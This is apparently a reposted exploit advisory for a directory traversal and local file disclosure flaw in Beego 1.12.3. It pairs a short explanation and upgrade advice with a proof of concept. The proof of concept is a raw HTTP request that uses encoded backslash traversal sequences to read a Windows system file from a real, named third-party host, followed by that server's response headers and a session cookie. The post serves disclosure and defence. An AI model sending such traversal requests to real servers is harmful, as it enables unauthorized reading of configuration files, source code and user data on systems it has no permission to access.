Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

 

 

Beego 1.12.3 is susceptible to a Directory Traversal and Local Beego 1.12.3 is susceptible to a Directory Traversal and Local File Disclosure vulnerability.
This flaw arises from insufficient sanitization of user-supplied paths, particularly when serving static files.
An attacker can craft a URL containing `../` (dot-dot-slash) sequences.
This allows them to traverse beyond the intended static file directory.
Consequently, arbitrary files on the server's file system can be read.
This includes sensitive information such as configuration files, source code, or user data.
The vulnerability grants unauthorized access to potentially critical system files.
Exploitation is straightforward, requiring only a specially crafted HTTP request.
To mitigate, users should upgrade Beego to version 1.12.4 or a later patched release.
Alternatively, ensure robust path validation is implemented for all static file serving.

=============================================================================================================================================
| # Title : Beego 1.12.3 Directory Traversal / Local File Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/beego/beego |
=============================================================================================================================================

[+] References :

[+] Summary : The vulnerability confirmed here is a Directory Traversal / Local File Disclosure affecting an application running on Beego 1.12.3.

[+] POC :

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host: door.casdoor.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 92
Content-Type: text/plain; charset=utf-8
Date: Sat, 06 Dec 2025 14:35:45 GMT
Last-Modified: Sat, 08 May 2021 08:18:31 GMT
Server: beegoServer:1.12.3
Set-Cookie: casdoor_session_id=891e4bf2d09b3240b7d1dd82ceba5c0f; Path=/; Expires=Mon, 05 Jan 2026 14:35:45 GMT; Max-Age=2592000; HttpOnly
Original-Content-Encoding: gzip


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Social Media Share